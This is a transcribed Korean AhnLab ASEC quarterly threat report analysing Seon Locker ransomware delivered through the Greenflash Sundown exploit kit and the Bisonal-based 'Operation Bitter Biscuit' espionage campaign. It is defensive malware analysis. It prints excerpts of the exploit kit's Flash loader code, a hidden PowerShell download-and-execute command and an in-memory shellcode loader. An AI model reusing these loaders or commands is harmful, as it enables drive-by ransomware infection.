ASEC REPORT VOL 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안
|
|
- 민진 저
- 5 years ago
- Views:
Transcription
1
2 ASEC REPORT VOL 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 더많은정보는안랩닷컴 (www. ahnlab.com) 에서확인하실수있습니다 년 4 분기보안동향 Table of Contents 보안이슈 SECURITY ISSUE 선락커랜섬웨어, 웹사이트접속만으로 감염된다 04 악성코드상세분석 ANALYSIS-IN-DEPTH 오퍼레이션비터비스킷 2018 년공격동향 15 ASEC REPORT Vol.93 Security Trend 2
3 보안이슈 SECURITY ISSUE 선락커랜섬웨어, 웹사이트 접속만으로감염된다
4 선락커랜섬웨어, 보안이슈 Security Issue 웹사이트접속만으로 감염된다 2018년 4분기, 온라인광고를통해멀버타이징기법으로유포된새로운랜섬웨어선락커 (Seon Locker) 가발견되었다. 악성코드 (Malware) 와광고 (Advertising) 의합성어인멀버타이징 (Malvertising) 기법은웹사이트에삽입되는광고를이용하여랜섬웨어를유포하는방식으로짧은시간동안다수의사용자에게노출되기때문에파급효과가크다. 특히이번에발견된랜섬웨어는국내언론사사이트의제휴광고에서발견된것으로보아, 공격자가국내사용자를타깃으로삼은것으로추정된다. 또한드라이브-바이다운로드 (Drive-by Download) 기법을이용해사용자들이감염사실을쉽게인지하지못하도록했다는것이특징이다. 안랩시큐리티대응센터 (AhnLab Security Emergency-response Center, 이하 ASEC) 는국내웹사 이트의광고를이용해유포된선락커랜섬웨어의공격기법과함께공격과정을면밀히분석했다. 01. 공격개요 그림 1-1 드라이브 - 바이다운로드 (Drive-By Download) 개요 ASEC REPORT Vol.93 Security Trend 4
5 공격자는선락커랜섬웨어유포를위해드라이브 - 바이다운로드기법을이용했다. 세부적인동작방식 은 [ 그림 1-1] 과같이사용자가파일다운로드를승인한경우와승인하지않은경우두가지로구분된다. 사용자가다운로드를승인한경우, 사용자가설치결과를알수없는파일이다운로드되어사용자의의도와는다른결과가나타난다. 한편사용자가다운로드를승인하지않은경우에도다운로드가발생한다. 이경우, 공격자는사용자의다운로드승인없이악성코드를다운로드하기위해인터넷익스플로러, 어도비플래시플레이어, 윈도우보안취약점등을악용한다. 그림 1-2 드라이브 - 바이다운로드 (Drive-By Download) 공격과정 (1) 공격자는드라이브 - 바이다운로드공격을위해 [ 그림 1-2] 와같이익스플로잇킷 (Exploit Kit) 을이용 한다. 해당익스플로잇킷에는프로그램의보안취약점을공격하는스크립트와악성코드가포함되는 데, 이번공격에서는그린플래시선다운 (Greenflash Sundown) 익스플로잇킷이사용됐다. 그림 1-3 드라이브 - 바이다운로드 (Drive-By Download) 공격과정 (2) ASEC REPORT Vol.93 Security Trend 5
6 익스플로잇킷을실행하기위해서는사용자가악성스크립트가삽입된웹사이트에방문해야한다. 공 격자는 [ 그림 1-3] 과같이정상사이트로위장한디코이 (Decoy) 사이트를제작하거나정상사이트를 해킹하여악성스크립트를삽입했다. 또한온라인광고를이용한멀버타이징기법을이용하기도했다. 최종적으로사용자가인터넷서핑중해당악성스크립트가삽입된웹사이트에접속하면 [ 그림 1-4] 와같이공격자서버에업로드된그린플래시선다운익스플로잇이실행된다. 이때시스템에보안취약점이존재할경우, 사용자도모르는사이시스템이악성코드에감염된다. 이와같은드라이브 - 바이다운로드공격은사용 그림 1-4 드라이브 - 바이다운로드 (Drive-By Download) 공격과정 (3) 자가악성코드감염사실을쉽게인지할수없다. 2. 공격과정공격자는그린플래시선다운익스플로잇킷을사용하기위해웹사이트에악성스크립트를삽입한다. 특징적인점은 [ 그림 1-5] 와같이국내언론사사이트에악성스크립트를삽입한것으로, 공격자는모든웹페이지에스크립트를삽입하는대신사용자의방문빈도수가높은웹페이지를주공격대상으로삼았다. 또한해당악성스크립트는웹페이지방문시사 용된웹브라우저가인터넷익스플로러 (Internet 그림 1-5 국내언론사사이트의웹페이지에삽입된악성스크립트 ASEC REPORT Vol.93 Security Trend 6
7 Explorer) 일경우에만그린플래시선다운익스플로잇킷의랜딩페이지 (Landing Page) 로연결시킨다. 랜딩페이지에연결되면어도비플래시플레이어의보안취약점을이용하기위해프로그램의버전을체크한다. 이번공격에사용된스크립트의경우플래시플레이어의메이저 (Major) 버전이 10 이상, 29 이하일경우에만위의명령어가실행된다. [ 표 1-1] 은그린플래시선다운익스플로잇킷랜딩페이지의일부다. Landing Page(ads.html) <object classid="clsid:d27cdb6e-ae6d-11cf-96b " width="400" height="400"> <param name="movie" value=" /> <param name="play" value="true" /> <param name="allowscriptaccess" value="always" /> 표 1-1 그린플래시선다운익스플로잇킷 - 랜딩페이지일부 조건이충족되어명령어가실행되면악성플래시파일이실행되는데, 그린플래시선다운익스플로잇 킷은탐지우회를위해총 3 단계의플래시파일로구성되어있다. SWF File(show_ads.js) var url:string = "B64Z5BF4fDB7eOg7J6BLc4o2aQUsCESreQ=="; var url_key:string = "QVNPbTIzbmxkMw=="; var url_key_byt:bytearray = new ByteArray(); var key:string = generaterandomstring(10); key_byte = new ByteArray(); key_byte.writemultibyte(key,"utf8"); var token:string = processdata(key); key = ""; if(activex == Capabilities.playerType) { url_dec = Rc4(Base64.decodeToByteArray(url_key),Base64.decodeToByteArray(url)); data_load = new URLLoader(); data_load.dataformat = URLLoaderDataFormat.BINARY; data_load.addeventlistener(event.complete,_jj18); _dv34 = new URLRequest(url_dec + "?token=" + encodeuricomponent(token)); data_load.load(_dv34); } 표 1-2 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 먼저 1 단계플래시파일에는 2 단계플래시파일의연결주소가스트링변수 url 에저장되어있다. 스트 링변수는 [ 표 1-2] 와같이 RC4 암호화방식을이용하여암호화되어있으므로이를복호화하여스트 ASEC REPORT Vol.93 Security Trend 7
8 링변수 url_dec 에다시저장된다. 이후영문대소문자와숫자가조합된 10 자리의랜덤문자열을생성 하여스트링변수키 (key) 에저장한다. SWF File(show_ads.js) var processdata:function = function(param1:string):string { var _loc2_:* = "-----BEGIN PUBLIC KEY-----\n" + "MFswDQYJKoZIhvcNAQEBBQADSgAwRwJAbkQoqittIfJPWqUP/O45yh9ZfI8hAae2\n" + "f0f8oqsehrucrlfezcxpwljgjqs426haiy/ifpsc3hdaykho9ytpbwidaqab\n" + "-----END PUBLIC KEY-----"; var _loc3_:bytearray = new ByteArray(); var _loc4_:bytearray = new ByteArray(); var _loc5_:string = ""; var _loc6_:rsakey = PEM.readRSAPublicKey(_loc2_); _loc3_ = Hex.toArray(Hex.fromString(param1)); _loc6_.encrypt(_loc3_,_loc4_,_loc3_.length); _loc5_ = Base64.encodeByteArray(_loc4_); return _loc5_; }; 표 1-3 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 저장한키는 [ 표 1-3] 과같이공격자의공개키를사용한 RSA 암호화방식으로다시암호화하여스트 링변수토큰 (token) 에저장된다. 이렇게생성된 url_dec 와토큰을조합하여 [ 표 1-4] 와같이 2 단계 플래시파일의연결을요청한다. Landing Page(ads.js) + "?token=" + encodeuricomponent(token) 생략 표 1-4 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 공격자서버에서 2단계플래시파일의연결이요청되면전달받은토큰을복호화하여키값을복원한다. 복원된키값으로 2단계플래시파일을 RC4 암호화방식으로암호화하여전송한다. 해당과정은 [ 그림 1-6] 과같다. 그림 1-6 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 전송받은암호화된 2 단계플래시파일은복호 ASEC REPORT Vol.93 Security Trend 8
9 화되어메모리상에실행되는데, [ 표 1-5] 와같이 2 단계플래시파일에는 3 단계플래시파일의연결 주소가스트링변수 wewqqww 에저장되어있다. 이전과마찬가지로 RC4 암호화방식을이용하여암호화되어있으므로복호화하여사용하는데이때사 용하는키값에서차이점을발견할수있다. 이전 1 단계플래시파일에서는키값으로랜덤문자열 10 자 리를사용했으나, 2 단계플래시파일에서는 3 단계플래시파일의연결주소를키값으로사용한다. SWF File(index.php) jjeiejiee = new ByteArray(); var _ver1:boolean = false; var wewqqqww:string = " Q 생략, 생략 "; var askjdskjw:number = 0; wewqqqww = wewqqqww.substr(0,wewqqqww.indexof(",")); var kwkw:string = "21"; var ddds3:string = mnznnznxzxzxzx(wewqqqww,kwkw); var sdkdjddd2:string = ""; sdkdjddd2 = ddds3.substr(7,ddds3.lastindexof("/") - 7); kbkiuiuui = new ByteArray(); kbkiuiuui.writeutfbytes(sdkdjddd2); if(zxzxzzszx()) { zbzvzzzzzzx = new URLLoader(); zbzvzzzzzzx.dataformat = URLLoaderDataFormat.BINARY; zbzvzzzzzzx.addeventlistener(event.complete,zxxzxnmmzz); request = new URLRequest(mnznnznxzxzxzx(wewqqqww,kwkw)); zbzvzzzzzzx.load(request); var zxzxzzszx:function = function():boolean { var _loc1_:string = Capabilities.version; _loc1_ = _loc1_.substr(4); _loc1_ = _loc1_.replace(/[,]/g,""); var _loc2_:uint = uint(_loc1_); if(! pop()) { return false; } if(_loc2_ < ) { if(_loc2_ > ) { } return true; } return false; }; 표 1-5 그린플래시선다운익스플로잇킷 플래시파일 (2 단계 ) 또한 2단계플래시파일에서는 3단계플래시파일을연결하기전사용자시스템에설치된플래시플레이어의버전을확인한다. [ 표 1-5] 와같이만약버전이 보다높을경우에는 3단계플래시파일을연결하지않는다. 3 단계플래시파일에는 [ 그림 1-7] 과같이어도 그림 1-7 그린플래시선다운익스플로잇킷 플래시파일 (3 단계 ) ASEC REPORT Vol.93 Security Trend 9
10 비플래시플레이어의보안취약점 CVE 에사용되는쉘코드가존재한다. 쉘코드가실행 되면시스템에 [ 표 1-6] 의명령어를실행한다. Command Line cmd.exe /q /c "powershell.exe -nop -w hidden -c $J=nEw-objEct net.webclient; $J.proxy=[NEt.WEbREquESt]::GEtSyStEmWEbProxy(); $J.Proxy.CrEdEntIalS=[NEt.CrEdEntIalCachE]::DEfaultCrEdEntIalS; IEX $J.downloadStrIng(' 릱릱.. 생략 표 1-6 명령어정보 해당명령어가실행되면윈도우운영체제의스크립트언어를실행하는파워쉘 (Powershell) 을이용하 여공격자서버로부터악성코드실행을위한데이터를요청한다. 공격자서버로부터전송받은데이터는한번더 Base64 와 Gzip 으로암호화되어있어복호화가필 요하다. Command Line [Byte[]]$key = [System.Text.Encoding]::ASCII.GetBytes("LU5V") $m = new-object System.Net.WebClient; [Byte[]]$data = $m.downloaddata(" [Byte[]]$iJF = rc4 $data $key $b0z = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((mu kernel32.dll VirtualAlloc), [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $ijf.length,0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($iJF, 0, $b0z, $ijf.length) 표 1-7 복호화한 index.php 페이지일부 복호화된데이터의일부를확인해보면 [ 표 1-7] 과같이플래시파일에서사용된것과마찬가지로 RC4 암호화를복호화하는코드와안티바이러스제품설치확인 (Window Defender), 시스템계정정보확인, 인코딩된바이너리를다운로드하기위한 URL 주소정보가존재한다. 최종적으로해당 URL에서다운로드된파일이사용자시스템에서악성행위를하게된다. ASEC REPORT Vol.93 Security Trend 10
11 지금까지확인된인코딩된바이너리는갠드크랩 (Gandcrab) 랜섬웨어와선락커랜섬웨어다. 다운로드된갠드크랩은 v5.04 버전으로, 관련내용은 ASEC 블로그에서확인할수있다. 한편, 이번에발견된선락커랜섬웨어의일련의 행위를살펴보면다음과같다. 먼저파워쉘을통 그림 1-8 인코딩된바이너리와디코딩된바이너리 해추가인코딩된바이너리가복호화된다. 이후 쉘코드가 MZ 부터 dave 문자열을찾을때까지메모리상에바이너리를복사한후선락커랜섬웨어 가실행될수있도록한다. 이는파일이생성되지않고, 메모리상에서실행되는파일리스기법으로선 락커랜섬웨어의특징중하나다. 또한선락커랜섬웨어는먼저기감염여부확인을위해 [ 표 1-8] 의레지스트리경로에키의유무를 확인한다. HKEY_CURRENT_USER\Software\GUN\Display\windowData 표 1-8 레지스트리경로 Registry path 만약해당레지스트리키가있다면그대로실행을종료한다. 키값이없는경우에는 0x30 크기의난수를생성하여 fixt_rbhz1htkfbhxsijz와 XOR 연산을하고, 인코딩을진행한뒤 0x50 크기의데이터를 [ 그림 1-9] 와같은레지스트리값으로저장한다. 해당레지스트리에저장된값은 추후복호화에사용한다. 그림 1-9 레지스트리값 ASEC REPORT Vol.93 Security Trend 11
12 선락커랜섬웨어는 GetDriveTypeW API 를이용해 A:\ 부터 Z:\ 까지 DRIVE_FIXED, DRIVE_REMOTE 에해당하는드라이브만감염대상으로삼는다. 드라이브경로검색과정은 [ 그림 1-10] 과같다. 그림 1-10 드라이브경로검색 또한암호화를위해파일명검사를진행하는데검사를위해문자열을모두소문자로변경하여검사한 다. 따라서악성코드에저장된암호화제외대상문자열은모두소문자다. 암호화제외대상 폴더 파일 system volume information programdata application data $windows.~bt program files tor browser Windows mozilla appdata windows.old program files (x86) $recycle.bin google boot bootsect.bak ntuser.ini thumbs.db your_files_are_encrypted.txt ntldr iconcache.db desktop.ini ntuser.dat.log bootfont.bin ntuser.dat boot.ini autorun.inf 확장자 mod adv dll msstyles mpa nomedia ocx cmd ps1 themepack sys prf diagcfg cab ldf diagpkg icl 386 ico cur ics ani bat com rtp diagcab nls msc deskthemepack idx msp msu cpl bin shs wpx icns exe rom theme hlp spl fixt lnk scr drv 표 1-9 암호화제외폴더, 파일및확장자 ASEC REPORT Vol.93 Security Trend 12
13 최종적으로선락커랜섬웨어는 [ 표 1-9] 의암호화제외대상을제외한나머지파일을모두암호화한뒤파일명뒤에 *.FIXT를추가한다. 암호화제외확장자에 fixt가포함된것을보아재감염을한번더방지하는것으로추정된다. 또한선락커랜섬웨어는파일암호화와상관없이폴더를들어갈때랜섬노트 YOUR_FILES_ARE_ENCRYPTED.TXT 파일을생성하며, 시스템감염이끝나면파워쉘이종료되어메모리에서사라진다. 선락커랜섬웨어의랜섬노트정보는 [ 표 1-10] 과같다. YOUR_FILES_ARE_ENCRYPTED.TXT SEON RANSOMWARE all your files has been encrypted There is only way to get your files back: contact with us, pay and get decryptor software We accept Bitcoin and other cryptocurrencies You can decrypt 1 file for free write to kleomicro@gmail.com or kleomicro@dicksinhisan.us 표 1-10 랜섬노트정보 지금까지살펴본것처럼선락커랜섬웨어는국내웹사이트를주요공격대상으로삼고있으며, 사용자가모르는사이웹사이트접속만으로도랜섬웨어에감염될수있어각별한주의가필요하다. 이와같은랜섬웨어감염피해를예방하기위해서는무엇보다보안업데이트를정기적으로설치하고, 백신및응용프로그램을항상최신버전으로유지하는등지속적인 PC 관리가필요하다. V3 제품군에서는해당선락커랜섬웨어를다음과같은진단명으로탐지하고있다. < V3 제품군진단명 > Malware/Gen.Generic ( ) Powershell/Seoncrypt ( ) BinImage/EncPE ( ) Malware/MDP.Ransom.M1996 ASEC REPORT Vol.93 Security Trend 13
14 악성코드 상세분석 ANALYSIS-IN-DEPTH 오퍼레이션비터비스킷 2018 년공격동향
15 악성코드상세분석 Analysis-In-Depth 오퍼레이션비터비스킷 2018 년공격동향 일명 오퍼레이션비터비스킷 (Operation Bitter Biscuit) 으로불리는공격은 2011년을기점으로본격화되었다. 비소날 (Bisonal) 류악성코드를이용하여국내군사기관, 방위산업체등의주요기관을표적으로삼아오랜기간동안공격을전개해왔다. 지난 2017년가을이후소강상태로접어드는것처럼보였던이공격은 2018년에또다시포착됐다. 한편, 공격에사용된비소날 (Bisonal) 류악성코드와관련해다수의공격그룹과의연관성이제기되었다. 안랩또한지난 2017년 3분기 ASEC Report를통해오퍼레이션비터비스킷의공격동향을다룬바있다. 이번보고서에서는 2018 년국내에서발생한실제공격사례를중심으로안랩시큐리티대응센터 (AhnLab Security Emergency-response Center, 이하 ASEC) 에서분석한오퍼레이션비터비스 킷의공격동향과공격기법을살펴본다. 01. 오퍼레이션비터비스킷공격동향 2010년최초발견된비소날류의악성코드는오퍼레이션비터비스킷공격에주로이용되며 2018년현재까지한국, 일본, 인도, 러시아등에대한공격에지속적으로등장했다. 국내에서는 2011년에최초발견되었으며, 다음해인 2012년에는일본의방위산업체에대한공격에이용되기도했다. 한편 2015 년인도 CERT에서는비소날변형인비오아지흐 (Bioazih) 에대해경고한바있다. 1 ASEC REPORT Vol.93 Security Trend 15
16 오퍼레이션비터비스킷의공격동향을분석한결과, 여전히비소날류악성코드가국내주요기관을노린공격에활발히사용됐음을확인했다. 2011년부터 2012년봄까지는국내기관에대한공격을수행하였으며, 2013년부터 2015년사이에는국내기업과군사기업에대한공격이계속됐다. 또한 2016 년과 2017년에는방위산업체와연관업체에대한공격이진행되었으며, 가장최근인 2018년에는국내해양관련분야에까지공격을집중적으로수행하며점차공격대상을확대한것으로보인다. 이와같이오퍼레이션비터비스킷의공격이오랜기간에걸쳐진행되면서안랩은지속적으로이들공격그룹을분석및추적해왔다 년국내공격사례 [ 표 2-1] 은 2018년오퍼레이션비터비스킷의주요공격을타임라인으로정리한것이다. 2017년가을이후잠잠하던공격은 2018년봄부터다시시작되었다. 2018년 3월부터 7월까지국내해양산업분야에대한공격이확인되었다. 일시 공격대상 내용 2018년 3월? ( 해양분야추정 ) 퇴사인수인계자료.scr로공격시도. 다운로더생성 2018년 3월 한국정부기구 2018년해양경찰청공무원 (7급 9급 ) ( ).pdf.exe로공격시도. 백도어생성 2018년 3월? ( 해양분야추정 ) 중형방탄정업무연락망1.pdf.exe로공격시도. 백도어생성 2018년 7월? ( 해양분야추정 ) 해양업체관련문서로위장. 패킹된다운로더생성 2018년 9월 한국정부기구 백도어만발견됨 표 년주요공격타임라인 2018 년공격의특징적인점은공격자가새로운드롭퍼 (Dropper) 를사용한다는점이다. 새롭게바뀐 드롭퍼가실행되면사용자를유인하는디코이 (Decoy) 문서를비롯해악성코드와 VBS(Visual Basic Script) 파일을생성한다. [ 그림 2-1] 의 2018 년에발견된악성코드의디코이문서내용을통해공격자는해양분야와관련된사 람에게공격을집중하고있음을확인할수있다. ASEC REPORT Vol.93 Security Trend 16
17 드롭퍼를통해생성되는악성코드는추가악성코드를다운로드하는다운로더 (Downloader) 와원격명령을수행하는백도어 (Backdoor) 로구분된다. 발견된악성코드중일부는파일끝에쓰레기값을추가해수십메가바이트 (Megabyte) 에서최대 100 메가바이트정도의길이를가진 그림 년발견된악성코드의디코이문서들 거대파일을생성하기도한다. 한편생성되는 VBS 파일의경우, 디코이문서를보여주는스크립트와실행된드롭퍼및실행된 VBS 파일자신을삭 제하는스크립트로나뉜다. 03. 악성코드분석 2018 년오퍼레이션비터비스킷공격에이용된드롭퍼, 다운로더, 백도어를살펴보자. 3-1) 드롭퍼 (Dropper) 분석 2018 년 3 월 5 일발견된 퇴사인수인계자료.scr 파일이드롭퍼로사용되었다. 드롭퍼의기본정보는 [ 표 2-2] 와같다. 파일이름 퇴사인수인계자료.scr 파일길이 260,968 파일생성기간 2015 년 12 월 26 일 22 시 1 분 29 초 (UTC 기준 ) MD5 SHA1 SHA256 주요기능및특징안랩진단명 e5a8c1df0360baeeeab767d8422cc58f 0ba e7e80c0911f666fd42a175dd419e0e 013c de3f6cc8266c79c7888d92eb1546a49493d1433b8261d2e41e77 디코이 (Decoy) 문서, 실행파일, VBS 파일생성 Dropper/Win32.Bisonal 표 2-2 드롭퍼기본정보 해당드롭퍼가실행되면 [ 그림 2-2] 와같이디코이 (Decoy) 문서, 실행파일, VBS 파일이생성된다. ASEC REPORT Vol.93 Security Trend 17
18 그림 2-2 악성코드구성 앞서언급한것처럼디코이문서를통해공격대상을유추할수있는데, 2018년발견된드롭퍼의디코이문서는모두국내해양분야와관련된내용이다. 또한실행파일은다운로더이며, 다른변형은백도어를포함하기도한다. 2개의 VBS 파일은디코이문서를오피스프로그램에서열게하는파일과실행된드롭퍼파일을삭제하는파일로구분된다. 3-2) 다운로더 (Downloader) 분석이번공격에사용된다운로더의주요기능및특징은실행된파일이름을검사하여 services.exe가아니면 c:\users\[username]\applications\microsoft 경로등에 services.exe 파일을생성하는것이다. 이때파일끝에쓰레기값을추가하여최종적으로약 4 MB 파일길이를가진파일을생성한다. 다운로더의기본정보는 [ 표 2-3] 과같다. 파일이름 3.tmp 파일길이 10,752 파일생성기간 2018 년 2 월 25 일 00 시 21 분 33 초 (UTC 기준 ) MD5 SHA1 SHA256 주요기능및특징안랩진단명 d198e4632f9c4b9a3efbd6b1ed378d26 bb8be657e4bf1eb9a89ae66cb6c8a8d6baa934d a64cc8fe823ab6d7c2166f1dbf9b75794d024ddbfaa173b6f9107a19f 4 메가바이트이상의길이를가진 services.exe를생성. 시스템정보를 ms.log로저장. 추가악성코드를다운로드 Trojan/Win32.Bisdow 표 2-3 다운로더기본정보 ASEC REPORT Vol.93 Security Trend 18
19 그림 2-3 원본파일과쓰레기값이추가된생성파일 [ 그림 2-3] 은원본파일과다운로더로인해쓰레기값이추가된생성파일을비교한것이다. 이는사 용자가해시값으로악성코드를찾기어렵게하기위해임의의파일을생성하는것으로추정된다. 어 떤변형은 100 MB 정도의길이가진파일을생성하기도했다. 다운로더는실행된파일이름이 services.exe 일경우레지스트리에 services.exe을등록하고 Windows Message.lnk 파일을생성하는데, Windows Message LNK 파일은 [ 그림 2-4] 와같이악성 services.exe의바로가기내용을담 고있다. 그림 2-4 LNK 파일내용 또한 ipconfig.exe, net.exe 을이용해시스템정보를 ms.log 파일에저장하고, com/info/wel.gif 로전송한다. [ 그림 2-5] 는시 스템정보수집내용이다 년에발견된변형에서만보이는다운로더 의특징은추가파일다운로드를시도할때 [ 그림 그림 2-5 시스템정보수집내용 2-6] 과같이디스크이름을통해가상환경내 ASEC REPORT Vol.93 Security Trend 19
20 실행을검사하는것이다 년이전에발견된변형에는가상환경검사기능이존재하지않는다. 그림 2-6 가상환경검사 다운로더는 에서 MsUpdata.exe 파일을다운로드한다. 안랩분석결과, 2018 년 3 월초해당주소에서 msupdata.exe (2c0522a805fa845ec9385eb5400e 8d16) 파일이배포되었음을확인했다. msupdata.exe 역시다른악성코드를다운로드하는다운로더 로, 최종적으로다운로드되는악성코드는확인되지않았다. 3-3) 백도어 (Backdoor) 분석 2018년에는유사한드롭퍼를통해백도어파일이생성되기도했다. 해당백도어와연관된악성코드는 2014년가을부터발견되었다. 동일한공격대상에서비소날변형이함께발견되기도했다. 백도어의기본정보는 [ 표 2-4] 와같다. 파일이름 파일길이 3.tmp 28,672 bytes 파일생성기간 2018 년 2 월 10 일 4 시 10 분 36 초 (UTC 기준 ) MD5 SHA1 SHA256 주요기능및특징안랩진단명 fc78fff75df0291d8c514f595f68c654 aec101161bdfada59b93ef47f1b814e4fea54c9e 6631d7045a2209ca5dbcf5071cb97eaea8cfba2e875a75e5535ba9180aaaf8d1 백도어 Backdoor/Win32.Bisoaks 표 2-4 백도어기본정보 ASEC REPORT Vol.93 Security Trend 20
21 비소날류변형인이들 Bisoaks 악성코드에서는 [ 그림 2-7] 과같이특징적으로 akspbu.txt, mismyou 와같은문자열이존재한다. 단, 일부악성코드는 PECompact 나 MPRESS 로패킹되어특 징적인문자열을확인할수없다. 그림 2-7 Bisoaks 악성코드의특징적문자열 해당악성코드가실행되면레지스트리의 HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrnetVersion\Run 의 mismyou 에실행된파일을등록한다. 최종적으로 C&C 서버에서전달받은명령을수행하는데, Bisoaks 악성코드에서지원하는기능은시 스템정보수집, 프로세스목록수집, 프로세스종료, 파일다운로드, 파일실행등이다. 일부변형에서 는자가삭제기능등도확인되었다. 04. 연관관계 2018년오퍼레이션비터비스킷공격을분석한결과, 이번공격에서사용된드롭퍼는공격자가새롭게제작한악성코드로추정된다. 하지만다운로더와백도어의경우과거 2014년공격과의연관성이있음이확인되었다. 비소날류변형인 Bisoaks 악성코드또한 2014년과 2018년에동일한곳에유사한코드를가진변형으로공격을수행했다. [ 그림 2-8] 은 2018년오퍼레이션비터비스킷공격에사용된악성코드의관계도이다. ASEC REPORT Vol.93 Security Trend 21
22 그림 년공격악성코드관계도 2014 년과 2018 년에발견된다운로더의문자열과코드의유사성 (fd45ecc5b ace52fc95 253ae) 은 [ 그림 2-9] 에서도확인할수있다. 그림 년과 2018 년다운로더문자열비교 일부변형의다운로드주소는국내와연관되어있다. 또한 [ 그림 2-10] 과같이악성코드파일에안랩 인증서로위장한허위인증서 (00c479bf76dc90db51209d2fa2a9cf6a) 를포함하고있는점으로미 ASEC REPORT Vol.93 Security Trend 22
23 루어한국이주요공격대상임을추론할수있다. 2018년에발견된 Bisoaks 백도어는특징적문자열이존재하는데, [ 그림 2-11] 과같이 2014년 10 월발견된변형 (45a416f10ccb2c31ff391e61a75 84f1f) 에도유사한문자열이존재하는것이확인 그림 2-10 안랩의디지털서명을사칭한다운로더파일 되었다. 그림 년 Bisoaks 변형의특징적문자열 [ 그림 2-12] 와같이 2014 년 9 월발견된변형과 2018 년 3 월발견된악성코드의코드또한상당한유 사성을띄고있다. 그림 년 9 월변형과 2018 년 3 월변형비교 ASEC REPORT Vol.93 Security Trend 23
24 한편, Bisoaks 악성코드에는캠페인 ID 가포함되어있으며한국에서발견된변형들에서는 0903, 0917, , 443, pmo, hjing, 24-kncck, 8000, 95, 48 등이확인되었다. 해당백도어의변형은총 29 개로, 2014 년 9 월부터관련변형이존재하며국내정부기관이주요공격 대상이었다. 따라서이공격자는최소 4 년동안한국에서활동중인것으로추정할수있다. 오퍼레이션비터비스킷공격이하나의그룹에서수행되고있는지는명확히확인되지않았지만, 2018 년의공격동향을통해 Bisoaks 악성코드또한오퍼레이션비터비스킷의연관악성코드로볼수있다. 2014년부터오퍼레이션비터비스킷공격에사용되고있는 Bisoaks 악성코드가 2018년에도유사하게사용되었기때문이다. [ 그림 2-13] 은오퍼레이션비터비스킷에서사용한악성코드를 2009년부터 2018년현재까지나열한것이다. 그림 2-13 오퍼레이션비터비스킷연관악성코드종류 05. 결론지난 2017년가을이후행적을감췄던오퍼레이션비터비스킷은올해 2018년 3월부터다시국내주요기관을향한공격을수행했다. 2017년까지는주로국내군사기업및방위산업체에대한공격을진행한반면 2018년에는해양관련분야에대한공격을집중적으로수행하며공격대상을확대한것으로보인다. 이들이명확히동일한그룹인지는확인되지않았지만, 공격에사용된악성코드의유사성 ASEC REPORT Vol.93 Security Trend 24
25 으로보아 2018 년봄에확인된공격은적어도 2014 년부터국내정부기관에대한공격을수행해왔음 을추정할수있다. 약 10 년가까이한국을노리고있는미지의위협은여전히은밀하게국내주요기관및기업을공격하 고있다 년에는해양분야만집중적으로공격했지만, 2019 년에는어느분야를새로운공격대상 으로삼을지오퍼레이션비터비스킷의앞으로의추이를지속적으로예의주시해야할것이다. 06. IoC (Indicators of Compromise) 드롭퍼 (Dropper) 1cd5a3e42e9fa36c342a2a4ea85feeb4 bbfcb2d66784c0f7afc334f18a0866a7 e3bac3712aaca2881d1f82225bb75860 e5a8c1df0360baeeeab767d8422cc58f e6e607ab6bd694ffcfe1451ed367d068 f b02858c0998ee4d726c8b8 다운로더 (Downloader) 00c479bf76dc90db51209d2fa2a9cf6a 2c0522a805fa845ec9385eb5400e8d16 40f69d d1f34f95e7a2c7924c 410a19c9e5d6269e0d e5fea 46224c767a6c a00bb9d f3c0bd6c1ecee df6e954d b13429ccf79d94a82dab0b30e d198e4632f9c4b9a3efbd6b1ed378d26 ef3103a76e101f7f19541d1cbbd2bd13 f61c3f0eb173b2c5f38a1c9d5acda0dc fd45ecc5b ace52fc95253ae 백도어 (Backdoor) 3cc4e80a358e0f bc79999cd 45a416f10ccb2c31ff391e61a7584f1f d0efdee5eaaf29cceab4678f652f04f9 fc78fff75df0291d8c514f595f68c654 URL 정보 파일이름 chrome.exe conhost.exe contray.exe msupdata.exe msviewer.exe serv.exe services.exe taskhost.exe (100 MB 이상파일길이가짐 ) ASEC REPORT Vol.93 Security Trend 25
26 ASEC REPORT Vol.93 Security Trend 26
27
#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
